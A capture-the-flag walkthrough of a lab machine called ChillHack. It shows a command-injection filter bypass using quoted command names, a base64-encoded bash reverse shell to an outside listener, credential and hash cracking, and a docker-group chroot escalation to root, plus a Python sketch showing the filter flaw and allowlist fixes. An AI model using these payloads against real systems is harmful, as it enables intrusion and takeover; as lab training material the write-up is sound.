ChillHack

Target IP: 10.10.167.84


Scanning

There are three TCP ports open on the target machine: FTP, SSH, and HTTP. I will start enumeration with FTP, as it allows anonymous login.


Enumeration

Port 21: FTP
This FTP server allows anonymous login. It holds a text file called note.txt with the content shown above. The note hints at two usernames, anurodh and apaar, and at the fact that the web application is using filtering.

Port 80: HTTP
The webpage above is displayed for this application.

I performed a directory search with the command gobuster dir -u http://10.10.167.84/ -w /usr/share/wordlists/dirb/big.txt -x php,html,txt and obtained the result above. There is an interesting page called /secret/index.php.

Browsing to /secret/index.php displays the page above. It offers a form that executes commands on the server. Is the target machine vulnerable to command injection?

Commands such as ls are prohibited: the message above is shown and the command is not executed. But there are numerous ways to bypass this!

The command ls is not allowed, but l's' is: the quotes defeat the filter's string match, while the shell strips them and still runs ls.

I used the payload c'a't index.php to read the source code of this page and identify the whitelist and blacklist filters in place; the output above is the source. The blacklist gives away a lot. It is very simple and can be bypassed in many ways, for example by inserting an even number of ' characters into a command name, which the shell removes before execution.
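As an added example (not the page's PHP, and not the box author's code), the Python sketch below shows why a substring blacklist of the kind described above fails against quoting: the shell removes the quotes before execution, so l's' runs ls and a quoted b'a'sh at the end of a pipeline still runs bash. The blacklist contents and the allowed command set are assumptions; the allowlist check at the end is the mitigation a defender would reach for.

```python
import re
import shlex

# Constructed stand-in for the page's PHP blacklist. The writeup confirms
# that ls, cat and bash are blocked; the full list is only in the screenshot.
BLACKLIST = ("ls", "cat", "bash")


def naive_blacklist_allows(cmd: str) -> bool:
    """The kind of check the page describes: reject the raw input if any
    blacklisted word appears in it as a substring."""
    return not any(bad in cmd for bad in BLACKLIST)


def shell_argv(cmd: str) -> list:
    """Tokenise the input the way a POSIX shell would (quotes and
    backslashes removed), so l's' and ls yield the same argv."""
    return shlex.split(cmd)


def normalised_blacklist_allows(cmd: str) -> bool:
    """Same blacklist, but applied to every token after quote removal.
    Catches l's', c'a't, and a b'a'sh at the end of a pipeline; still a
    denylist, so only a partial fix."""
    try:
        tokens = shell_argv(cmd)
    except ValueError:  # unbalanced quotes: refuse rather than guess
        return False
    return not any(tok in BLACKLIST for tok in tokens)


def allowlist_allows(cmd: str, allowed=("date", "uptime", "whoami")) -> bool:
    """Mitigation: an exact allowlist of command names plus plain
    alphanumeric arguments, with every quote and shell metacharacter
    rejected outright. The allowed set is an assumption, not the page's."""
    if re.search(r"[^-A-Za-z0-9_ ]", cmd):
        return False
    words = cmd.split()
    return bool(words) and words[0] in allowed
```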


Exploitation


I used the payload /bin/bash -i >& /dev/tcp/10.14.55.153/8443 0>&1 and base64-encoded it, which gives L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjE0LjU1LjE1My84NDQzIDA+JjE=. Then I prefixed it with echo and suffixed it with | base64 -d | bash, writing bash as b'a'sh to get past the filter. I started a listener on port 8443, sent the payload, and received a reverse shell connection from the target machine. Now I have a foothold on the machine. The full payload is shown below.

echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjE0LjU1LjE1My84NDQzIDA+JjE='| base64 -d | b'a'sh

Privilege Escalation

Looks like /home/apaar/.helpline.sh can be executed with sudo as apaar.
Now I have a shell as apaar. I entered /bin/sh as the input and then ran python3 -c 'import pty; pty.spawn("/bin/bash");' to upgrade to an interactive TTY shell. The line $msg 2>/dev/null in the script, which runs the supplied input as a command, is responsible for the command execution.

The file /var/www/files/index.php contains the credential root:!@m+her00+@db.

Now I have access to the MySQL service using the credentials above.

There is an interesting database called webportal with the table users. This table contains the entries shown above.

I copied the two password hashes into a text file called hash and ran john on it, obtaining the passwords above. However, spraying these credentials against the other users did not work.

The page hacker.php gives a hint about the image.

There is an interesting directory with images. I started a Python HTTP server on the target machine and downloaded the two files to my local machine.

The image contains a zip file called backup.zip, but it is password protected. I extracted the hash of this file and cracked it with john; the password is pass1word.

I extracted the file source_code.php, which contains the information above. The password of the user anurodh is encoded in base64.

After decoding it, I obtained the password !d0ntKn0wmYp@ssw0rd and used it to log in over SSH.

Running id shows the user is a member of the docker group. I used the command docker run -v /:/mnt --rm -it alpine chroot /mnt sh, which mounts the host's root filesystem into an alpine container and chroots into it, to escape the container boundary. Now I have a root shell. GG.


Flags

The local.txt flag, obtained after escalating privileges to apaar.

The proof.txt flag.